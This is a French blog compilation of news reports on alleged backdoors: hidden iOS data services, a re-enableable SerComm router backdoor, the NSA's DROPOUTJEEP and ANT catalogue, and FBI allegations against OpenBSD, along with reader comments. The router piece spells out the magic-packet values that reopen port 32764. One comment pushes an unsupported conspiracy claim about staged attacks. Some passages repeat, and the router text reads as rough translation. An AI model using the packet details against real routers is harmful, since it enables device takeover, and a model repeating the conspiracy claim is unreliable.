• com.apple.mobile.file_relay qui liste entre autres : les comptes configurés sur le matériel (Twitter, FB, email, ...), la base des contacts en SQLite (et contenant les éventuelles entrées effacées), les caches (photos partagées, dernier écran affiché, presse-papier, ...), logs GPS, calendrier, notes, messages vocaux, SMS, ...

Tous ces services contournent tout chiffrement côté iOS et Jonathan Zdziarski est persuadé que les sociétés éditrices de logiciels pour la police judiciaire sont d'ores et déjà capables d'extraire des données qui pourraient être réclamées dans le cadre d'enquêtes. On ne sait pas si la NSA y a accès.
 Mais on  soupçonne la NSA de profiter de ces outils pour récupérer en douce des données des iPhone, par le biais du programme DROPOUTJEEP, que nous avons déjà évoqué ici.


Néanmoins Jonathan essaye de dédramatiser sur son blog. Il ne croit pas en une conspiration Apple/NSA. Son message dit simplement que certains services (comme le sniffer) n'ont rien à faire dans 600 millions de smartphnoes et espère qu'Apple corrigera le tir !
[MàJ] Apple a formellement démenti avoir installé des portes dérobées dans ses produits et réaffirme n'avoir jamais coopéré avec une quelconque agence gouvernementale pour l'aider à espionner ses clients et ne le fera jamais.


 Jonathan Zdziarski, un expert de la police scientifique américaine, a fait une annonce étonnante à la conférence Hackers On Planet Earth (HOPE/X) qu'iOS contiendrait de nombreuses backdoors qui pourraient permettre à Apple et au gouvernement de récupérer des données privées. Un certain nombre de services tournants sur iOS, sans besoin d'être dans un mode développeur, permettraient d'extraire des données du mobile et de les récupérer grâce à des outils de la police scientifique.

Par exemple, comme Jonathan l'explique dans sa présentation dont les slides sont disponibles ICI.

• com.apple.pcapd qui snif et dump toute l'activité réseau (un sniffer serait donc intégré à 600 millions d'appareils)
• com.apple.mobile.file_relay qui liste entre autres : les comptes configurés sur le matériel (Twitter, FB, email, ...), la base des contacts en SQLite (et contenant les éventuelles entrées effacées), les caches (photos partagées, dernier écran affiché, presse-papier, ...), logs GPS, calendrier, notes, messages vocaux, SMS, ...Zdziarski donne bien plus de détails sur com.apple.mobile.file_relay. Et pour cause, c’est selon lui celui qui pose le plus de problèmes. « Ce service est la plus grande source de renseignements sur l’appareil d’un utilisateur et, selon mon opinion, un service de backdoor qui, quand il est utilisé à pleine capacité, fournit des informations qui ne peuvent être utiles qu’à une agence de maintien de l’ordre ou d’espionnage » indique-t-il dans son article.
  Ce bout de logiciel est il est vrai ultra-puissant. On s’explique : il est capable d’outrepasser le cryptage du téléphone, de récupérer à peu près n’importe quelle donnée qui s’y trouve (carnet d’adresse, logs du GPS, photos, calendrier, contacts, cache du clavier, bref : tout)  et d’en faire une belle archive zippée qu’on a plus qu’à extraire.
  Ce qui est d’autant plus incroyable qu’aucune référence à ce service n’existe dans les différents logiciels Apple, d’iTunes à Xcode en passant par Apple Configurator. Autrement dit, son utilité est un mystère. « Si Apple a pu, à un moment ou à un autre, utiliser une partie de ces informations pour les utiliser notamment à des fins de diagnostic, il est clair qu’une majorité de ces données sont bien trop personnelles pour être utilisées par Apple ou pour quoique ce soit d’autre que du renseignement ou du maintien de la loi. »Reste qu’exploiter ces fonctions secrètes n’est pas à la portée des pirates du dimanche. Pour ce faire, il faut avoir eu accès à la fois au terminal mobile et à un ordinateur auquel l’iPhone ou l’iPad a été relié au moins une fois après avoir été débloqué par un code et considéré comme fiable.

  Car quand vous connectez un appareil Apple à un ordi, il échange une série de clés cryptographiques avec celui-ci, une fois que la connexion est estimée sûre par l’utilisateur. Ce n’est qu’ensuite que les services étranges dont nous parlons plus haut peuvent être activés.

  Mais ce procédé d’appairage n’est pas sûr, selon Zdziarski : d’abord parce que les clés en question ne sont jamais effacées (à moins de faire une restauration totale du téléphone). « Autrement dit, tous les ordinateurs auxquels le téléphone a été connecté une fois conservent un passepartout capable d’accéder au contenu du mobile » indique le chercheur. Autre souci, le hacker qui disposerait de la fameuse clé est en mesure d’accéder au téléphone sans-fil, à partir du moment où il se trouve sur le même réseau Wi-Fi. « Cela signifie qu’un attaquant n’a besoin que de quelques secondes pour s’appairer avec un appareil et peut ensuite y accéder depuis un réseau pour télécharger des données personnelles ou commettre d’autres forfaits »précise M. Zdziarski.

Tous ces services contournent tout chiffrement côté iOS et Jonathan Zdziarski est persuadé que les sociétés éditrices de logiciels pour la police judiciaire sont d'ores et déjà capables d'extraire des données qui pourraient être réclamées dans le cadre d'enquêtes. On ne sait pas si la NSA y a accès.

Néanmoins Jonathan essaye de dédramatiser sur son blog. Il ne croit pas en une conspiration Apple/NSA. Son message dit simplement que certains services (comme le sniffer) n'ont rien à faire dans 600 millions de smartphnoes et espère qu'Apple corrigera le tir !

[MàJ] Apple a formellement démenti avoir installé des portes dérobées dans ses produits et réaffirme n'avoir jamais coopéré avec une quelconque agence gouvernementale pour l'aider à espionner ses clients et ne le fera jamais.
Lien vers le billet original

 Apple est une boite US, s'étonner de ce genre de chose c'est faire un candide de luxe...
Une boite US qui gère le moindre de vos service est un espion de masse... c'est inscrit en noir sur blanc dans les textes de lois....
L'ignorer est faire preuve d'une stupidité crasse. Bien avant snowden tout ceci est connu des gens qui bossent dans la sécurité....

Il serait grand temps de faire du hardware français ou européen... sauf que tous nos gouvernement sont depuis bien longtemps déjà impliqués dans cette gigantesque toile d'araignée qui vise à suivre l'ensemble de la population tout en laissant perpétrer des attentats "terroristes" pour justifier l'augmentation des mesures de surveillances... (ben oui si c'était reconnu comme efficace, y aurai pas besoin de pousser le bouchon de plus en plus loin... la video surveillance pardon protection en est le plus bel exemple...)

Si vous ne comprenez pas ça, rallumez au plus vite votre télé... et bienvenu dans la de moins en moins soft-dictature...

Tout ce qui tourne autour de l'informatique et des réseaux est lié aux USA, ne vous étonnez pas que nos gentils "alliés" déploient tout ça contre nous (et le peuple américain compris)...

La NSA n'aurait pas accès à des logiciels de police scientifique ? Mais ils traînent en P2P !
 Je pense que toutes les applications contiennent de nombreux back-doors... Et la tendance doit sans doute augmenter avec la taille de l'application.
Quand on développe on apprécie pouvoir échanger des données ou des instructions avec une appli en train de tourner. Ce n'est pas a priori malveillant mais c'est potentiellement fâcheux, certes.
Faut-il en faire un psychodrame comme on aime en faire parfois dans certains milieux... Je ne le pense pas.

 # Dans le cas du sniffing reseau avec pcapd, c'est soit une blague, soit simplement histoire de faire du volume en écriture :

http://en.wikipedia.org/wiki/Pcap

la librairie PCAP est distribue PAR default dans la majorité des Unix like, car utilisée comme librairie principale de tcpdump...
Si s'était une backdoor, autant l'appeler "JE_SUIS_UN_DAEMON_DE_SNIFFING_RESEAU" ;-P

# Dans le cas du file relay daemon, et de la partie encrypte du filesystem quant l'OS tourne, autant en rire aussi, car c'est la meme chose pour Windows avec bitlocker, ou bien ... MAC OS X avec Filevault :

lorsque l'OS tourne, il a besoin d'avoir access a la "clé" de decryptage de la/des partition encrypte, et un access physique a la machine, permet, via un memory dump, d'y acceder ... et bien sur, les fichier d'hibernation la contienne aussi. rien de nouveau au soleil, et surtout, c'est partout la meme chose

Il faut pas se leurrer ici, ce n'est : ni nouveau, ni different des autres : http://www.elcomsoft.com/efdd.html



Par contre, la partie interessante, est plutôt la partie qui commence sur la Theorie : pourquoi avoir sur des machines mobiles tout cet "arsenal" d'outil normalement utiliser sur des machines dont l'utilisation est bien bien differente !
Et surtout, la partie des Design pattern a suivre, certain étant deja en place dans Mac OS X depuis 10.8 ... au moins ...

Comme d'ab, beaucoup de bruit pour pas grand chose... ça me rappelle le petit fichier caché de localisation d'iOS qui enregistrait les positions courantes.

Oui, il faut être conscient que tel ou tel chose peut-être réalisée mais à part crier au scandale, vous apportez des solutions ? A part utiliser TOR (qui n'est pas pratique je trouve et lent), encrypter ses données (mais dans ce cas, illisibles sous OS X sauf via une app spécifique), utiliser un téléphone sous Cyanogen mode ? Utiliser Silent Circle ? C'est bien beau mais si je suis le seul à avoir un abonnement Silent Circle, cela ne sert à rien. Donc à mon avis, il faut utiliser ce qu'on a en étant conscient de ce qui peut se faire avec nos données et essayer de les "contrôler" au maximum de ce qui nous est possible de faire.

Si vous avez d'autres astuces, je suis preneur ! Mais je n'ai encore rien trouvé d'idéal...


REF.:
Source.:

 

Backdoor: Si vous voulez vérifier votre routeur sans fil, utiliser Proof-of - Concept

Au début de cette année , nous avons rapporté sur la porte dérobée secret » TCP 32764 » découvert dans plusieurs routeurs , y compris, Linksys , Netgear , Cisco et diamant qui a permis à un attaquant d'envoyer des commandes aux routeurs vulnérables à port TCP 32764 à partir d'une ligne de commande débourser sans être authentifié en tant qu'administrateur .
Le Reverse- ingénieur de France Eloi Vanderbeken , qui a découvert ce backdoor a constaté que bien que la faille a été corrigée dans la dernière version du firmware , mais SerComm a ajouté de nouveau la même porte dérobée d'une autre manière .(décevant)


Pour vérifier le patch publié , récemment, il a téléchargé la version du firmware patché 1.1.0.55 de Netgear DGN1000 et décompressé en utilisant binwalk outil. Il a constaté que le fichier ' scfgmgr ' qui contient la porte dérobée est toujours présent là-bas avec une nouvelle option "-l" , qui limite ce que pour une communication socket interprocessus locale ( socket de domaine Unix ) , ou seulement pour les processus en cours d'exécution sur le même dispositif .
Le complément d'enquête par ingénierie inverse les binaires , il a trouvé un autre outil mystérieux appelé « ft_tool " avec l'option "-f" qui pourraient ré- active la backdoor TCP .
Dans son rapport illustré (ci-dessous ) , il a expliqué que « ft_tool « effectivement ouvrir une socket raw , qui écoute les paquets entrants et les attaquants sur le réseau local peut réactiver la porte dérobée au port TCP 32764 en envoyant des paquets spécifiques suivants:
EtherType paramètre doit être égal à '0 x8888 ' .
Charge utile devrait contient hachage MD5 du DGN1000 de valeur ( 45d1bb339b07a6618b2114dbc0d7783e ) .
Le type d'emballage devrait être 0x201 .

Ainsi, un attaquant peut réactiver le TCP 32764 porte dérobée afin d'exécuter des commandes shell sur les routeurs de SerComm vulnérables , même après l'installation de la version corrigée .
Maintenant la question se lève , pourquoi les fabricants de routeurs ajoutent encore et encore des portes dérobées intentionnels ? Peut -être la raison derrière à un coup de main pour l'agence de renseignement américaine NSA .
Actuellement, il n'existe pas de patch disponible pour backdoor nouvellement découvert . Si vous voulez vérifier votre routeur sans fil pour cette porte dérobée , vous pouvez télécharger Proof-of - Concept ( PoC ) exploit publié par le chercheur partir d'ici ou suivez les étapes ci-dessous donnés manuellement:
Utilisez ' binwalk -e' pour extraire le système de fichiers
Recherche pour ' ft_tool »ou grep- r' scfgmgr - f
Utilisez l'IDA pour confirmer.


REF.:

Cisco, Dell, Huawei..., les équipementiers télécoms infiltrés par la NSA ?

Sécurité : Nouvelles révélations du Spiegel sur la NSA pour ce début d'année. L'infiltration est large. Très large, puisqu'elle irait jusqu'aux coeurs de réseau de certains équipementiers.

L'unité des Tailored Access Operations (TAO) de la NSA fait encore parler d'elle en ce début d'année 2014. Elle fait, de plus en plus, figure "d'arme secrète" ultime pour l'agence de renseignement, alors que le journal allemand Der Spiegel révèle de nouvelles informationsd'Edward Snowden sur ses agissements.

Cette unité spéciale aurait eu pour mission, entre autres, d'infiltrer les réseaux et les appareils électroniques à un niveau sans précédent. La méthode est connue : elle aurait insérée des portes dérobées ('backdoor') dans différents appareils électroniques grand public ou professionnels.

On ne sait pas bien comment. Toujours est-il que si la polémique reste boursouflée autour de l'iPhone depuis ce début d'année, la présence d'éventuelles backdoors au sein des équipements de coeur de réseau est tout aussi, voire plus, inquiétante.

Catalogue de techniques d'infiltration

Ainsi, des matériels d'Apple, Blackberry, Cisco, Dell, Huawei, Juniper, Maxtor, Samsung, Seagate, Western Digital auraient été compromis. Ceux-ci ont été révélés par un catalogue de l'ANT, division de la NSA chargée de trouver des failles et de fournir des techniques d'infiltration au groupe TAO et à d'autres unités de la NSA.

Une cinquantaine de pages, publiées en 2008 en interne et transmises au Spiegel par Snowden, montrent quelques exemples édifiants. Parmi lesquels on retrouve des équipements de Cisco, Huawei, ou Juniper. Particulièrement inquiétant vu l'enjeu critique de ces matériels. Et particulièrement étonnant en ce qui concerne Huawei, le seul équipementier non-américain.

Les passoires se rebiffent

Autre source d'étonnement : le nom d'Alcatel n'apparaît pas dans la liste. Une situation qui s'explique, selon un spécialiste du secteur interrogé par nos confrères de Silicon, par "la faible taille de l'équipementier français" vu, "dans ce contexte", comme "un atout".

Des "passoires" qui n'ont pas tardé à réagir : Cisco a fait part de son mécontentement dans un billet de blog, annonçant lancer une enquête. Il n'est pour l'heure pas au courant "de nouvelles vulnérabilités sur [ses] produits" et affirme ne pas travailler "avec les gouvernements pour affaiblir [ses] produits".

On notera également la réponse d'Apple autour de l'iPhone. Dell et Huawei ont également communiqué pour nier leur connaissance du programme TAO ou leur implication, à quelque niveau que ce soit. Des dénégations qui rappellent celles des géants du net, et risquent de rester, elles aussi, dans le flou.

REF.:

La NSA a accès à une porte dérobée sur les iPhones

NSA, ça continue. Après avoir successivement appris hier que l’agence gouvernementale pouvait hijacker votre connexion WiFi à plus de 12 km de distance et installer des mouchards dans les ordinateurs avant qu’ils soient mis en vente, voici qu’on a vent de leur accès à une porte dérobée sur les iPhones !

On connaissait déjà le goût prononcé de la NSA des portes dérobées (les « backdoors », en anglais). Désormais, on apprend que l’une de ces porte dérobée touche les iPhones d’Apple. Comprenez simplement que la NSA peut potentiellement avoir accès à n’importe quel smartphone estampillé Apple en moins de deux, comme le confirment le chercheur en sécurité Jacob Appelbaum et le média allemand Der Spiegel.

Utilisant un programme nommé DROPOUTJEEP, la NSA va avoir accès à toutes les communications ou presque émises ou arrivant sur un iPhone. En fait, ça va même beaucoup plus loin que ça : l’agence gouvernementale peut intercepter les SMS du mobile, avoir accès à sa liste de contacts, localiser un mobile utilisant une antenne relais, et même activer son micro et sa caméra sans que son propriétaire ne s’en aperçoive ! Plutôt effrayant, n’est-ce pas ? Et comme l’affirme le document à l’origine de cette information, c’est un taux de réussite de 100% qui fut jusque là rencontré par DROPOUTJEEP, bien qu’un contact physique avec le smartphone soit requis pour lui injecter. Pour le moment tout du moins, puisque les documents font état de la mise en chantier d’une version qu’il serait possible d’injecter à n’importe quel iPhone à distance.

Alors, trop beau pour être vrai ? Selon Jacob Appelbaum, la NSA pourrait collecter les informations à propos des systèmes critiques produits par les sociétés américaines, pour ensuite les saboter. A moins qu’Apple ne se saborde lui-même, comme le laisse également entendre le chercheur en sécurité ? Dans les deux cas, ça ferait presque froid dans le dos !

Viagizmodo

REF.:

Le FBI soupçonné d’avoir intégré des backdoors dans OpenBSD

Sécurité - Un expert employé à la fin des années 90 par le FBI a informé le fondateur de la communauté OpenBSD avoir développé au sein d’une cellule spéciale des portes dérobées. Celles-ci permettraient de dérober des clés de chiffrement et d’intercepter du trafic chiffré. Un audit du code est en cours.

Wikileaks n'a pas le monopole des révélations. Celle qui agite la communauté OpenBSD émane directement de son fondateur Theo de Raadt. C'est un message électronique de Gregory Perry, ancien directeur technique de NetSec (devenu Verizon Business Security) qui a mis le feu aux poudres.

Gregory Perry a profité de l'expiration d'une clause de confidentialité signée avec le FBI pour révéler l'affaire. L'expert a ainsi informé Theo de Raadt avoir assisté techniquement le FBI à la fin des années 90 dans le but d'insérer du code dans OpenBSD.

Les parefeu et VPN reprenant le code d'OpenBSD potentiellement concernés

Objectif du projet : permettre à l'agence fédérale américaine d'effectuer des interceptions. Les développements de la cellule formée par le FBI portaient en effet sur « des backdoors dans des systèmes de cartes à puce et dans des frameworks cryptographiques » d'OpenBSD analyse LeMagIT.

Pour Gregory Perry, l'existence de ces backdoors justifient notamment l'attachement manifesté par le FBI à promouvoir OpenBSD dans les solutions parefeu et VPN. Depuis les 10 dernières années, le code du système d'exploitation a cependant beaucoup évolué.

Des accusations qui restent à démontrer

Mais Gregory Perry encourage le fondateur de la communauté OpenBSD et ses membres à auditer le code lié à la cryptographie, et en particulier les contributions de Scott Lowe.

Ce dernier, expert de la virtualisation chez EMC, est en effet directement pointé du doigt par Perry qui l'accuse de travailler pour le compte du FBI en promouvant l'utilisation de machines virtuelles OpenBSD dans vSphere de VMware.

Scott Lowe a rapidement réagi sur son blog pour démentir ces informations. Malgré le scepticisme de certains experts à l'égard des différentes accusations formulées par Perry, celles-ci sont malgré tout prises avec sérieux.

Le code source soupçonné d'abriter des portes dérobées ayant été largement réutilisé dans d'autres produits, notamment des distributions, l'affaire dépasse la seule communauté OpenBSD. L'audit du code, et en particulier du stack IPSec, est quoi qu'il en soit lancé.

Voici la réponse,(du 29 Dec 2010):

OpenBSD : pas de porte dérobée identifiée dans le code source

Au terme d’un premier audit, la communauté OpenBSD n’a détecté aucune porte dérobée dans son code source. Au début du mois, Gregory Perry soupçonnait des développeurs d’avoir codé des backdoors pour le compte du FBI.

En décembre, le fondateur d'OpenBSD et OpenSSH a reçu un mail lui indiquant que des portes dérobées pouvaient avoir été insérées à la fin des années 90 dans le code de l'OS, et ce pour le compte du FBI. Le message émanait de Gregory Perry, ancien directeur technique de NetSec.

Selon ce dernier, des développeurs avaient été rémunérés par l'agence gouvernementale américaine pour coder des backdoors dans le framework cryptographique d'OpenBSD et dans certains éléments de la pile réseau.

Malgré le scepticisme de certains experts et les dénégations des développeurs mis en cause, Theo de Raadt avait décidé de lancer un audit du code de l'OS Open Source. Premier bilan : si deux bugs ont été identifiés au niveau de la cryptographie, ceux-ci seraient accidentels et non le fruit d'une malveillance.

Pour autant Theo de Raadt n'exclut pas que la société NetSec ait pu concevoir des portes dérobées pour le compte du gouvernement américain. Il estime en revanche peu probable que celles-ci aient été insérées dans le code d'OpenBSD (mais plus probablement dans les propres produits de NetSec, devenue Verizon Business Security).

REF.: zdnet.fr,